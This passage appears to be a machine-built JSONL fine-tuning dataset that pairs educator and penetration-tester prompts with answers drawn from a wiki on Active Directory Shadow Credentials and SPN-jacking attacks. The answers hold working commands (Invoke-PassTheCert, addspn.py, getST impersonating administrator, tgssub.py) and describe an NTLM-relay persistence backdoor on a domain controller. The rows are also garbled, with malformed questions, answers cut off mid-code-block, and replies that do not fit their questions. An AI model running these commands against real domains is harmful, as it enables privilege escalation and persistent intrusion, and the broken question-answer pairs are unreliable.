DOE,CN=Users,DC=ADLAB,DC=LOCAL'", "metadata": {"corpus_index": 734, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Populates the targeted account's 'msDS-KeyCredentialLink' attribute with a new self-signed certificate."}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'ShadowCreds' -Target 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'\n``\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n:::\n\n> [!TIP] Self edit the KCL attribute\n> User objects can't edit their own msDS-KeyCredentialLink attribute while computer objects can. This means the following scenario could work: trigger an NTLM authentication from DC01, relay it to DC02, make pywhisker edit DC01's attribute to create a Kerberos PKINIT pre-authentication backdoor on it, and have persistent access to DC01 with PKINIT and pass-the-cache.\n> \n> Computer objects can only edit their own msDS-KeyCredentialLink` attribute if KeyCredential is not set already."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Populates the targeted account's 'msDS-KeyCredentialLink' attribute with a new self-signed certificate.", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'ShadowCreds' -Target 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'\n``\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n:::\n\n> [!TIP] Self edit the KCL attribute\n> User objects can't edit their own msDS-KeyCredentialLink attribute while computer objects can. This means the following scenario could work: trigger an NTLM authentication from DC01, relay it to DC02, make pywhisker edit DC01's attribute to create a Kerberos PKINIT pre-authentication backdoor on it, and have persistent access to DC01 with PKINIT and pass-the-cache.\n> \n> Computer objects can only edit their own msDS-KeyCredentialLink` attribute if KeyCredential is not set already.", "metadata": {"corpus_index": 735, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Populates the targeted account's 'msDS-KeyCredentialLink' attribute with a new self-signed certificate.?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'ShadowCreds' -Target 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'\n``\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n:::\n\n> [!TIP] Self edit the KCL attribute\n> User objects can't edit their own msDS-KeyCredentialLink attribute while computer objects can. This means the following scenario could work: trigger an NTLM authentication from DC01, relay it to DC02, make pywhisker edit DC01's attribute to create a Kerberos PKINIT pre-authentication backdoor on it, and have persistent access to DC01 with PKINIT and pass-the-cache.\n> \n> Computer objects can only edit their own msDS-KeyCredentialLink` attribute if KeyCredential is not set already."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Populates the targeted account's 'msDS-KeyCredentialLink' attribute with a new self-signed certificate.?", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'ShadowCreds' -Target 'CN=John JD. DOE,CN=Users,DC=ADLAB,DC=LOCAL'\n``\n\nWhen the public key has been set in the msDs-KeyCredentialLink of the target, the certificate generated can be used with Pass-the-Certificate to obtain a TGT and further access.\n\n:::\n\n> [!TIP] Self edit the KCL attribute\n> User objects can't edit their own msDS-KeyCredentialLink attribute while computer objects can. This means the following scenario could work: trigger an NTLM authentication from DC01, relay it to DC02, make pywhisker edit DC01's attribute to create a Kerberos PKINIT pre-authentication backdoor on it, and have persistent access to DC01 with PKINIT and pass-the-cache.\n> \n> Computer objects can only edit their own msDS-KeyCredentialLink` attribute if KeyCredential is not set already.", "metadata": {"corpus_index": 735, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/shadow-credentials.md", "page_title": "Shadow Credentials", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about SPN-jacking - Theory?"}, {"role": "assistant", "content": "This attack combines Kerberos Constrained delegation abuse and DACL abuse. A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The \"set of services\" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the msDS-AllowedToDelegateTo attribute of the KCD service's object.\n\nIn standard KCD abuse scenarios, an attacker that gains control over a \"KCD service\" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to modify it, the attacker could also gain admin access to the server the \"listed SPN\" belongs to.\n\nOn top of all that, if attacker is able to move a \"listed SPN\" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by Elad Shamir in this post.\n\n1. In order to \"move the SPN\", the attacker must have the right to edit the target object's ServicePrincipalName attribute (i.e. GenericAll, GenericWrite over the object orWriteProperty over the attribute (called WriteSPN since BloodHound 4.1), etc.).\n2. If the \"listed SPN\" already belongs to an object, it must be removed from it first. This would require the same privileges (GenericAll, GenericWrite, etc.) over the SPN owner as well (_a.k.a. \"Live SPN-jacking\"_). Else, the SPN can be simply be added to the target object (_a.k.a. \"Ghost SPN-jacking\"_)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about SPN-jacking - Theory?", "response": "This attack combines Kerberos Constrained delegation abuse and DACL abuse. A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The \"set of services\" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the msDS-AllowedToDelegateTo attribute of the KCD service's object.\n\nIn standard KCD abuse scenarios, an attacker that gains control over a \"KCD service\" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to modify it, the attacker could also gain admin access to the server the \"listed SPN\" belongs to.\n\nOn top of all that, if attacker is able to move a \"listed SPN\" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by Elad Shamir in this post.\n\n1. In order to \"move the SPN\", the attacker must have the right to edit the target object's ServicePrincipalName attribute (i.e. GenericAll, GenericWrite over the object orWriteProperty over the attribute (called WriteSPN since BloodHound 4.1), etc.).\n2. If the \"listed SPN\" already belongs to an object, it must be removed from it first. This would require the same privileges (GenericAll, GenericWrite, etc.) over the SPN owner as well (_a.k.a. \"Live SPN-jacking\"_). Else, the SPN can be simply be added to the target object (_a.k.a. \"Ghost SPN-jacking\"_).", "metadata": {"corpus_index": 736, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for SPN-jacking - Theory"}, {"role": "assistant", "content": "This attack combines Kerberos Constrained delegation abuse and DACL abuse. A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The \"set of services\" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the msDS-AllowedToDelegateTo attribute of the KCD service's object.\n\nIn standard KCD abuse scenarios, an attacker that gains control over a \"KCD service\" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to modify it, the attacker could also gain admin access to the server the \"listed SPN\" belongs to.\n\nOn top of all that, if attacker is able to move a \"listed SPN\" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by Elad Shamir in this post.\n\n1. In order to \"move the SPN\", the attacker must have the right to edit the target object's ServicePrincipalName attribute (i.e. GenericAll, GenericWrite over the object orWriteProperty over the attribute (called WriteSPN since BloodHound 4.1), etc.).\n2. If the \"listed SPN\" already belongs to an object, it must be removed from it first. This would require the same privileges (GenericAll, GenericWrite, etc.) over the SPN owner as well (_a.k.a. \"Live SPN-jacking\"_). Else, the SPN can be simply be added to the target object (_a.k.a. \"Ghost SPN-jacking\"_)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for SPN-jacking - Theory", "response": "This attack combines Kerberos Constrained delegation abuse and DACL abuse. A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The \"set of services\" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the msDS-AllowedToDelegateTo attribute of the KCD service's object.\n\nIn standard KCD abuse scenarios, an attacker that gains control over a \"KCD service\" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to modify it, the attacker could also gain admin access to the server the \"listed SPN\" belongs to.\n\nOn top of all that, if attacker is able to move a \"listed SPN\" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by Elad Shamir in this post.\n\n1. In order to \"move the SPN\", the attacker must have the right to edit the target object's ServicePrincipalName attribute (i.e. GenericAll, GenericWrite over the object orWriteProperty over the attribute (called WriteSPN since BloodHound 4.1), etc.).\n2. If the \"listed SPN\" already belongs to an object, it must be removed from it first. This would require the same privileges (GenericAll, GenericWrite, etc.) over the SPN owner as well (_a.k.a. \"Live SPN-jacking\"_). Else, the SPN can be simply be added to the target object (_a.k.a. \"Ghost SPN-jacking\"_).", "metadata": {"corpus_index": 736, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is SPN-jacking - Practice?"}, {"role": "assistant", "content": "> [!TIP]\n> In this scenario, we assume the Kerberos Constrained Delegation is configured with protocol transition in order to keep things simple. However, the SPN-jacking attack can be conducted on KCD without protocol transition as well (cf. RBCD technique).\n> \n> In this scenario (following Elad's post):\n> \n> * serverA is configured for KCD\n> * serverB's SPN is listed in serverA's KCD configuration\n> * serverC is the final target\n> * attacker controls serverA, has at least WriteSPN over serverB (if needed, \"live SPN-jacking\"), and at least WriteSPN over serverC.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like machines, krbrelayx's addspn.py and Impacket example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n> [!NOTE]\n> _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding the tgssub.py is pending._ _The pull request_ _modifying the findDelegation.py is pending._\n> \n> _At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique._\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is SPN-jacking - Practice?", "response": "> [!TIP]\n> In this scenario, we assume the Kerberos Constrained Delegation is configured with protocol transition in order to keep things simple. However, the SPN-jacking attack can be conducted on KCD without protocol transition as well (cf. RBCD technique).\n> \n> In this scenario (following Elad's post):\n> \n> * serverA is configured for KCD\n> * serverB's SPN is listed in serverA's KCD configuration\n> * serverC is the final target\n> * attacker controls serverA, has at least WriteSPN over serverB (if needed, \"live SPN-jacking\"), and at least WriteSPN over serverC.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like machines, krbrelayx's addspn.py and Impacket example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n> [!NOTE]\n> _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding the tgssub.py is pending._ _The pull request_ _modifying the findDelegation.py is pending._\n> \n> _At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique._\n\n```bash", "metadata": {"corpus_index": 737, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SPN-jacking - Practice"}, {"role": "assistant", "content": "> [!TIP]\n> In this scenario, we assume the Kerberos Constrained Delegation is configured with protocol transition in order to keep things simple. However, the SPN-jacking attack can be conducted on KCD without protocol transition as well (cf. RBCD technique).\n> \n> In this scenario (following Elad's post):\n> \n> * serverA is configured for KCD\n> * serverB's SPN is listed in serverA's KCD configuration\n> * serverC is the final target\n> * attacker controls serverA, has at least WriteSPN over serverB (if needed, \"live SPN-jacking\"), and at least WriteSPN over serverC.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like machines, krbrelayx's addspn.py and Impacket example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n> [!NOTE]\n> _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding the tgssub.py is pending._ _The pull request_ _modifying the findDelegation.py is pending._\n> \n> _At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique._\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SPN-jacking - Practice", "response": "> [!TIP]\n> In this scenario, we assume the Kerberos Constrained Delegation is configured with protocol transition in order to keep things simple. However, the SPN-jacking attack can be conducted on KCD without protocol transition as well (cf. RBCD technique).\n> \n> In this scenario (following Elad's post):\n> \n> * serverA is configured for KCD\n> * serverB's SPN is listed in serverA's KCD configuration\n> * serverC is the final target\n> * attacker controls serverA, has at least WriteSPN over serverB (if needed, \"live SPN-jacking\"), and at least WriteSPN over serverC.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like machines, krbrelayx's addspn.py and Impacket example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n> [!NOTE]\n> _At the time of writing, 12th Feb. 2022,_ _the pull request_ _adding the tgssub.py is pending._ _The pull request_ _modifying the findDelegation.py is pending._\n> \n> _At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique._\n\n```bash", "metadata": {"corpus_index": 737, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 1. show SPNs listed in the KCD configuration"}, {"role": "assistant", "content": "findDelegation.py -user 'serverA$' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 1. show SPNs listed in the KCD configuration", "response": "findDelegation.py -user 'serverA$' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 738, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 1. show SPNs listed in the KCD configuration?"}, {"role": "assistant", "content": "findDelegation.py -user 'serverA$' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 1. show SPNs listed in the KCD configuration?", "response": "findDelegation.py -user 'serverA$' \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 738, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 2. remove SPN from ServerB if required (live SPN-jacking)"}, {"role": "assistant", "content": "addspn.py --clear -t 'ServerB$' -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" 'DomainController.domain.local'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 2. remove SPN from ServerB if required (live SPN-jacking)", "response": "addspn.py --clear -t 'ServerB$' -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" 'DomainController.domain.local'", "metadata": {"corpus_index": 739, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 2. remove SPN from ServerB if required (live SPN-jacking)?"}, {"role": "assistant", "content": "addspn.py --clear -t 'ServerB$' -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" 'DomainController.domain.local'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 2. remove SPN from ServerB if required (live SPN-jacking)?", "response": "addspn.py --clear -t 'ServerB$' -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" 'DomainController.domain.local'", "metadata": {"corpus_index": 739, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 3. add SPN to serverC"}, {"role": "assistant", "content": "addspn.py -t 'ServerC$' --spn \"cifs/serverB\" -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" -c 'DomainController.domain.local'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 3. add SPN to serverC", "response": "addspn.py -t 'ServerC$' --spn \"cifs/serverB\" -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" -c 'DomainController.domain.local'", "metadata": {"corpus_index": 740, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 3. add SPN to serverC"}, {"role": "assistant", "content": "addspn.py -t 'ServerC$' --spn \"cifs/serverB\" -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" -c 'DomainController.domain.local'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 3. add SPN to serverC", "response": "addspn.py -t 'ServerC$' --spn \"cifs/serverB\" -u \"$DOMAIN\"/\"$USER\" -p \"$PASSWORD\" -c 'DomainController.domain.local'", "metadata": {"corpus_index": 740, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy"}, {"role": "assistant", "content": "getST -spn \"cifs/serverB\" -impersonate \"administrator\" 'domain/serverA$:$PASSWORD'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy", "response": "getST -spn \"cifs/serverB\" -impersonate \"administrator\" 'domain/serverA$:$PASSWORD'", "metadata": {"corpus_index": 741, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy"}, {"role": "assistant", "content": "getST -spn \"cifs/serverB\" -impersonate \"administrator\" 'domain/serverA$:$PASSWORD'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy", "response": "getST -spn \"cifs/serverB\" -impersonate \"administrator\" 'domain/serverA$:$PASSWORD'", "metadata": {"corpus_index": 741, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 5. Edit the ticket's SPN (service class and/or hostname)?"}, {"role": "assistant", "content": "tgssub.py -in serverB.ccache -out newticket.ccache -altservice \"cifs/serverC\"\n``\n\nOnce the final service ticket is obtained, it can be used with Pass the Cache / Pass the Ticket to access the target.\n\n=== Windows\n\nFrom Windows machines, PowerView (PowerShell) and Rubeus (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 5. Edit the ticket's SPN (service class and/or hostname)?", "response": "tgssub.py -in serverB.ccache -out newticket.ccache -altservice \"cifs/serverC\"\n``\n\nOnce the final service ticket is obtained, it can be used with Pass the Cache / Pass the Ticket to access the target.\n\n=== Windows\n\nFrom Windows machines, PowerView (PowerShell) and Rubeus (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n``powershell", "metadata": {"corpus_index": 742, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 5. Edit the ticket's SPN (service class and/or hostname)"}, {"role": "assistant", "content": "tgssub.py -in serverB.ccache -out newticket.ccache -altservice \"cifs/serverC\"\n``\n\nOnce the final service ticket is obtained, it can be used with Pass the Cache / Pass the Ticket to access the target.\n\n=== Windows\n\nFrom Windows machines, PowerView (PowerShell) and Rubeus (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 5. Edit the ticket's SPN (service class and/or hostname)", "response": "tgssub.py -in serverB.ccache -out newticket.ccache -altservice \"cifs/serverC\"\n``\n\nOnce the final service ticket is obtained, it can be used with Pass the Cache / Pass the Ticket to access the target.\n\n=== Windows\n\nFrom Windows machines, PowerView (PowerShell) and Rubeus (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).\n\n``powershell", "metadata": {"corpus_index": 742, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Once command to 5. edit the ticket's spn (service class and/or hostname)"}, {"role": "assistant", "content": "Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the Ticket](ptt.md) to access the target.\n\n\n=== Windows\n\nFrom Windows machines, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) (PowerShell) and [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Once command to 5. edit the ticket's spn (service class and/or hostname)", "response": "Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the Ticket](ptt.md) to access the target.\n\n\n=== Windows\n\nFrom Windows machines, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) (PowerShell) and [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).", "metadata": {"corpus_index": 743, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 5. Edit the ticket's SPN (service class and/or hostname)"}, {"role": "assistant", "content": "Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the Ticket](ptt.md) to access the target.\n\n\n=== Windows\n\nFrom Windows machines, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) (PowerShell) and [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 5. Edit the ticket's SPN (service class and/or hostname)", "response": "Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the Ticket](ptt.md) to access the target.\n\n\n=== Windows\n\nFrom Windows machines, [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) (PowerShell) and [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).", "metadata": {"corpus_index": 743, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/spn-jacking.md", "page_title": "SPN-jacking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Once the final service ticket is obtained, it can be used with [Pass the Cache](ptc.md) / [Pass the 